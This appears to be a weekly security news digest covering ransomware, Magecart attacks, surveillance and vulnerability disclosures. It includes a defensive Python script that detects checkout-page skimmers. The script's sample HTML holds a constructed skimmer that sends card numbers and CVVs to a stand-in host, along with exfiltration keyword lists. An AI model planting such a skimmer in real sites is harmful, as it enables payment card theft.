Table of Contents

  1. Privacy
    1. Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis
    2. Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search
  2. Surveillance
    1. Bruce Schneier - Scaring People into Supporting Backdoors
  3. Crime
    1. NGINX office under police raid
    2. Another Ransomware Will Now Publish Victims' Data If Not Paid
    3. Microsoft Warns of GALLIUM Threat Group Attacking Global Telcos
    4. Maze Ransomware Demands $6 Million Ransom From Southwire
    5. Iran Banks Burned, Then Customer Accounts Were Exposed Online
    6. Hundreds of Counterfeit Sneaker Sites Hacked to Steal Credit Cards
    7. VISA Warns of Ongoing Cyber Attacks on Gas Pump POS Systems
  4. Vulnerabilities
    1. Local Privilege Escalation in OpenBSD's dynamic loader
    2. IoT Vuln Disclosure: Children's GPS Smart Watches (R7-2019-57)
    3. Lots of bugs in 32-bit x86 Linux entry code

Privacy

Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis

There has been a lot of creepy and concerning news about how Amazon's Ring smart doorbells are bringing surveillance to suburbia and creating data-sharing relationships between Amazon and law enforcement. A live podcast in which people who had broken into Ring accounts broadcast audio from the victims' cameras was shut down after it reached mainstream news.

Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search

The requests, outlined in two search warrants obtained by Forbes, demanded to know which specific Google customers were located in areas covering 29,387 square meters (or 3 hectares) during a total of nine hours for the four separate incidents. Unbeknownst to many Google users, if they have “location history” turned on, their whereabouts are stored by the tech giant in a database called SensorVault.

Surveillance

Bruce Schneier - Scaring People into Supporting Backdoors

Beware of the Four Horsemen of the Information Apocalypse: terrorists, drug dealers, kidnappers, and child pornographers. Seems like you can scare the public into allowing the government to do anything with those four. Strong encryption is necessary for personal and national security, weakening encryption does more harm than good, and law enforcement has other avenues for criminal investigation than eavesdropping on communications and stored devices.

Crime

NGINX office under police raid

Rambler claims that it, not NGINX, owns the NGINX web server, and the claim led to a police raid on the NGINX office in Moscow.

Another Ransomware Will Now Publish Victims' Data If Not Paid

The operators of the REvil Ransomware, otherwise known as Sodinokibi, have announced that they will use stolen files and data as leverage to get victims to pay ransoms. The ransom text is in Russian.

Microsoft Warns of GALLIUM Threat Group Attacking Global Telcos

GALLIUM is one of many activity groups Microsoft sees targeting telcos across Southeast Asia, Europe and Africa. The group appears to operate from China.

Maze Ransomware Demands $6 Million Ransom From Southwire

The group behind the Maze ransomware has claimed responsibility for an attack on the wire and cable manufacturer Southwire, demanding a $6 million ransom to decrypt the data. This is the same group that attacked the city of Pensacola a few days earlier and the security staffing firm Allied Universal.

Iran Banks Burned, Then Customer Accounts Were Exposed Online

Details of 15 million Iranian bank debit cards were published on social media in the aftermath of the protests; that number is roughly a fifth of the country's population.

Hundreds of Counterfeit Sneaker Sites Hacked to Steal Credit Cards

Malwarebytes has discovered a large-scale attack on counterfeit sneaker sites in which Magecart skimmer scripts are injected to steal credit card information. The attack appears to originate from China.
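The practical defence against this kind of injection is to know exactly which scripts your checkout page is supposed to load and to alarm on anything else. The checker below is an added example, not Malwarebytes' detection logic or code from any affected site: it collects every script tag from a page, flags external scripts whose host is not on an allowlist, and flags inline scripts that both read payment fields and contain an exfiltration primitive. The HTML, the hostnames (`static.shop.example`, `cdn-shop-assets.example`) and the indicator lists are constructed for illustration.

```python
"""Audit a checkout page for injected (Magecart-style) skimmer scripts.

Added example, not code from Malwarebytes or from any of the affected sites.
The HTML, the hostnames and the indicator lists below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately loads scripts from (hypothetical allowlist).
ALLOWED_HOSTS = {"static.shop.example"}

# Inline-script heuristics: a skimmer reads payment fields AND ships them out.
PAYMENT_INDICATORS = ("cardnumber", "card_number", "cvv", "cvc", "expir")
EXFIL_INDICATORS = ("btoa(", "new image", "sendbeacon", "xmlhttprequest", "fetch(")


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page: external src or inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of {"src": str or None, "body": str}
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for scripts that do not belong on the page."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            parsed = urlparse(s["src"].strip())
            host = parsed.netloc.lower()
            if parsed.scheme in ("data", "javascript"):
                findings.append({"kind": "external", "src": s["src"], "host": host,
                                 "reason": "script loaded from a %s: URL" % parsed.scheme})
            elif host and host not in allowed_hosts:
                findings.append({"kind": "external", "src": s["src"], "host": host,
                                 "reason": "host not in allowlist"})
            # A relative src (no host) is same-origin and accepted here.
        else:
            body = s["body"].lower()
            pay = [k for k in PAYMENT_INDICATORS if k in body]
            exf = [k for k in EXFIL_INDICATORS if k in body]
            if pay and exf:
                findings.append({"kind": "inline", "indicators": pay + exf,
                                 "reason": "inline script reads payment fields and exfiltrates"})
    return findings


# Constructed checkout page: two legitimate scripts, one look-alike CDN host,
# one harmless inline script and one inline skimmer.
SAMPLE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://static.shop.example/jquery.min.js"></script>
<script src="https://cdn-shop-assets.example/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
document.querySelector('#checkout').addEventListener('submit', function () {
  var d = {n: document.getElementById('cardNumber').value,
           c: document.getElementById('cvv').value};
  new Image().src = 'https://cdn-shop-assets.example/i.gif?q=' + btoa(JSON.stringify(d));
});
</script>
</head><body><form id="checkout"></form></body></html>"""

if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_HTML):
        print(f)
```

Run periodically against the live checkout page (or wire the same function into a CI check over the deployed HTML) and any new host or any inline script touching card fields becomes a ticket. The keyword heuristic is deliberately simple; a strict Content-Security-Policy with an explicit `script-src` and `connect-src` is the control that stops the exfiltration itself, and this check is the monitor that tells you when the page has drifted from it.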

VISA Warns of Ongoing Cyber Attacks on Gas Pump POS Systems

The attack appears to come from a financially motivated group. The attackers used an unknown vector to gain network access and then infected the POS environment with a RAM-scraping payload that specifically targeted magnetic stripe transactions.

Vulnerabilities

Local Privilege Escalation in OpenBSD's dynamic loader

A bug in OpenBSD's dynamic loader (ld.so) lets a low-privileged local user gain root. A patch has already been released.

IoT Vuln Disclosure: Children's GPS Smart Watches (R7-2019-57)

Rapid7 tested three brands of GPS smart watches for children. All of them were extremely insecure, and none of the vendors publish any contact information online. All three are produced in China and use essentially the same hardware in different cases. The SMS filtering option has no effect, so anyone can interact with the device via SMS, and the watches ship with a default configuration password of 123456 that cannot be changed.

Lots of bugs in 32-bit x86 Linux entry code

32-bit x86 Linux is no longer properly maintained, and many serious security bugs in its kernel entry code have been discovered and fixed. Kernel developers are asking users to migrate to an x86-64 kernel, or to find and pay someone to maintain the 32-bit code properly.